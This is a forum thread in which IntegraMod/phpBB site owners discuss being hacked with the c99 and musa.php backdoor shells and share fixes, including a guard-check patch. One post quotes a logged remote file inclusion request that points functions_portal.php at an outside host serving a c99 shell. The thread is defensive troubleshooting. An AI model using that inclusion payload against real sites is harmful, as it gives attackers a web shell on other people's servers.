Moderator: Integra Moderator
"jwernerny";p="14006" wrote:c99.php is a backdoor hacker script that is installed to writable directories. I had another version of it on my site a while back and it keeps trying to come int. It was called musa.php then.
Anyone want to share what hosting service their sites were on?
- John
"honie";p="14009" wrote:Ive looked & I cant find either of those files, which directory would they be in?
BTW, my host is globat
"suicico";p="13995" wrote:just today i got hacked as well ..
i wasnt able to load my site at all .
so i went to my latest visitors page and i noticed that the visitor with the i.p : 172.151.112.178
was fooling around with functions.php .
to be more precise here is an example
/includes/functions_portal.php?phpbb_root_path=http%3A%2F%2Ftz4rr.webcindario.com%2Fc99shell.gif%3F&act=img&im
the other think to get you suspicious is that this person came refered from google with the search "Powered by integramod"
Well this dude had deleted the content of portal.php so the solution was to overwrite it, and all came back to normal ..
just pay attention now and then to your referals .
edit. the dude did the same to index.php
"Solomon";p="14007" wrote:I just whiped out musa.php right before you posted. Your asking what hosting service, is this relevant for prevention? In other words, do some hosters block this backdoor script and others do not?
Little e-peen Team was here !
Fatal error: Call to undefined function: phpbbsecurity_blocks() in /home/xxxxxxx/public_html/forum/common.php on line 392
"Unregistered";p="14069" wrote:one more thing.. the backup folder you guys talking abt... wel, put a password on that folder as well.. <img>
"suicico";p="14070" wrote:also i dont know if this help but doing a search on google about functions_portal.php i came to this
http://www.integramod.com/forum/viewtop ... e0e7bfb752
this sounds like a solution i think
#-----[ OPEN ]---------------------------------------------#includes/functions_portal.php ##-----[ FIND ]---------------------------------------------# Line 22include_once($phpbb_root_path . 'includes/lite.'.$phpEx); ##-----[ BEFORE, ADD ]---------------------------------------------#if ( !defined('IN_PHPBB') ){ die('Hacking attempt'); exit;}
"Unregistered";p="14109" wrote:all the sites which used premoded files were hacked? or did u guys updated manually by using FIND / REPLACE codes?
"ErikG";p="14161" wrote:Could it be that it is simply written "down below". As they seem to search via google or some such and look for powered by integramod etc, but here it says powered by kismod.
Could it be so simple?
Registered users: App360MonitorBot, Bing [Bot], Google [Bot]